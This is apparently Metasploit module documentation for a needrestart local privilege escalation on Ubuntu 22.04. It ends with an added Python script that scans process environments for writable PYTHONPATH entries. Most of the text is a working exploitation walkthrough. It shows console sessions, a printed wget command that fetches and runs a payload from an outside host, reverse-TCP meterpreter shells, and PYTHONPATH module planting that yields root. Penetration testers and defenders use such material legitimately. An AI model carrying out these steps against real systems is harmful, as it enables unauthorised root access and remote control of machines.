## Vulnerable Application

Local attackers can execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled `PYTHONPATH` environment variable.

Verified against Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1.

Exploitation against vulnerable needrestart versions on Debian 12 and Fedora 39 was unsuccessful; however, install and run instructions are listed below.

### Debian

Install: `apt-get install needrestart=3.6-4+deb12u1`

Binary location: `/usr/sbin/needrestart`

### Fedora 39

Install: `dnf install needrestart-3.6-9.fc39.noarch`

Binary location: `/usr/sbin/needrestart`

## Verification Steps

1. Install the application
2. Start msfconsole
3. Get an initial shell
4. Do: `use exploit/linux/local/ubuntu_needrestart_lpe`
5. Do: `set lhost `
6. Do: `set lport `
7. Do: `set session `
8. Do: `run`
9. You should get a root shell.

## Options

### ListenerTimeout

The maximum number of seconds to wait for a session. Defaults to `90,000` which is 25hrs.

## Scenarios

### Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1

Gain initial shell

```
msf > use exploit/multi/script/web_delivery 998 run[*] Using configured payload python/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set target 7
target => 7
msf exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(multi/script/web_delivery) > set lport 4998
lport => 4998
msf exploit(multi/script/web_delivery) > set srvport 8998
srvport => 8998
msf exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 1.1.1.1:4998
[*] Using URL: http://1.1.1.1:8998/dKtdkMS
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Ejq8lHli --no-check-certificate http://1.1.1.1:8998/dKtdkMS; chmod +x Ejq8lHli; ./Ejq8lHli& disown
[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4998 -> 2.2.2.2:52004) at 2024-11-22 12:07:55 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: h00die
meterpreter > background
[*] Backgrounding session 1...
```

Priv Esc

```
msf exploit(multi/script/web_delivery) > use exploit/linux/local/ubuntu_needrestart_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(linux/local/ubuntu_needrestart_lpe) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(linux/local/ubuntu_needrestart_lpe) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(linux/local/ubuntu_needrestart_lpe) > set lport 4977
lport => 4977
msf exploit(linux/local/ubuntu_needrestart_lpe) > set session 1
session => 1
msf exploit(linux/local/ubuntu_needrestart_lpe) > set verbose true
verbose => true
msf exploit(linux/local/ubuntu_needrestart_lpe) > run

[*] Started reverse TCP handler on 1.1.1.1:4977
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5-5ubuntu2.1 detected on Ubuntu 22.04
[*] Writing '/tmp/.1K8Hy2tOtq' (250 bytes) ...
[*] Uploading payload: /tmp/.1K8Hy2tOtq
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.FzzlJ
[*] Launching exploit, and waiting for needrestart to run...
```

On the remote Ubuntu box run `sudo needrestart`

```
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] chown: changing ownership of '/tmp/.1K8Hy2tOtq': Operation not permitted
[*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth:
[*]
[*] Traceback (most recent call last):
[*] File "/usr/lib/python3.10/site.py", line 192, in addpackage
[*] exec(line)
[*] File "", line 1, in
[*] ImportError: dynamic module does not define module export function (PyInit_importlib)
[*]
[*] Remainder of file ignored
[*] #########################
[*]
[*] Dont mind the error message above
[*]
[*] Waiting for needrestart to run...
[*] Payload owned by: root
[+] Deleted /tmp/.1K8Hy2tOtq
[+] Deleted /tmp/.FzzlJ
[+] Deleted /tmp/importlib
[*] Meterpreter session 2 opened (1.1.1.1:4977 -> 2.2.2.2:57644) at 2024-11-22 12:08:28 -0500

meterpreter >
meterpreter > getuid
Server username: root
```
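
A detection-side check for the condition described under Vulnerable Application, as an added example (it is not part of this module or of needrestart). It flags running processes whose `PYTHONPATH` contains a directory an unprivileged user can write to, and lists entries there that shadow standard-library modules, such as the `importlib/__init__.so` staged in the scenario above. The function names and the "plantable" heuristic are assumptions of this example.

```python
import os
import stat
import sys

# sys.stdlib_module_names exists on Python 3.10+; the fallback only knows importlib.
STDLIB = getattr(sys, "stdlib_module_names", frozenset({"importlib"}))

def parse_environ(raw):
    """Parse the NUL-separated KEY=VALUE records of /proc/<pid>/environ."""
    pairs = (item.partition(b"=") for item in raw.split(b"\0"))
    return {k.decode(errors="replace"): v.decode(errors="replace") for k, sep, v in pairs if sep}

def plantable(path):
    """True if a non-root user could place files in this directory."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISDIR(st.st_mode) and (st.st_uid != 0 or bool(st.st_mode & stat.S_IWOTH))

def shadowed_stdlib(path):
    """Entries in `path` whose module name collides with a standard-library module."""
    try:
        return sorted(n for n in os.listdir(path) if n.split(".", 1)[0] in STDLIB)
    except OSError:
        return []

def audit_environ(raw):
    """Return (directory, shadowing entries) for each plantable PYTHONPATH entry."""
    entries = parse_environ(raw).get("PYTHONPATH", "").split(os.pathsep)
    # Only absolute entries are checked; relative ones depend on the process's cwd.
    return [(e, shadowed_stdlib(e)) for e in entries if os.path.isabs(e) and plantable(e)]

def scan_proc(proc="/proc"):
    """Audit every readable process environment (run as root to cover all users)."""
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(os.path.join(proc, pid, "environ"), "rb") as fh:
                raw = fh.read()
        except OSError:
            continue  # process exited or its environ is not readable
        yield from ((pid, d, names) for d, names in audit_environ(raw))

if __name__ == "__main__":
    for pid, directory, names in scan_proc():
        print(f"pid {pid}: PYTHONPATH entry {directory} is plantable; shadows stdlib: {names}")
```

A hit with a non-empty shadow list is the stronger signal; a plantable `PYTHONPATH` entry alone can also come from ordinary per-user development setups.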